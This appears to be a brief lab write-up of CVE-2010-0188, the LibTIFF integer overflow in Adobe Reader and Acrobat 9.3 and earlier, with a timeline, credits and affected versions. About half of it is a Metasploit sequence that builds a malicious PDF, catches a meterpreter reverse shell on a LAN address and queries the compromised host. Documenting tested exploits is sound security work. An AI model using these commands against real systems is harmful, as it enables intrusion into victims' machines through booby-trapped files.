CVE-2010-0188 : Adobe Acrobat Bundled LibTIFF Integer Overflow

Timeline :

Vulnerability reported by Microsoft to vendor
Coordinated public disclosure the 2010-02-16
PoC provided by villy the 2010-03-12
Metasploit PoC provided by duck the 2010-03-16
PoC provided by villy on Exploit-DB the 2010-03-17

    PoC provided by :

Microsoft
villy
jduck

    Reference(s) :

CVE-2010-0188

    Affected version(s) :

Adobe Reader 9.3 and earlier versions for Windows, Macintosh, and UNIX
Adobe Acrobat 9.3 and earlier versions for Windows and Macintosh

    Tested on Windows XP SP3 with :

    Adobe Reader 9.3.0

    Description :

This module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions 8.0 through 8.2 and 9.0 through 9.3.

    Commands :

use exploit/windows/fileformat/adobe_libtiff
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
sysinfo
getuid
ipconfig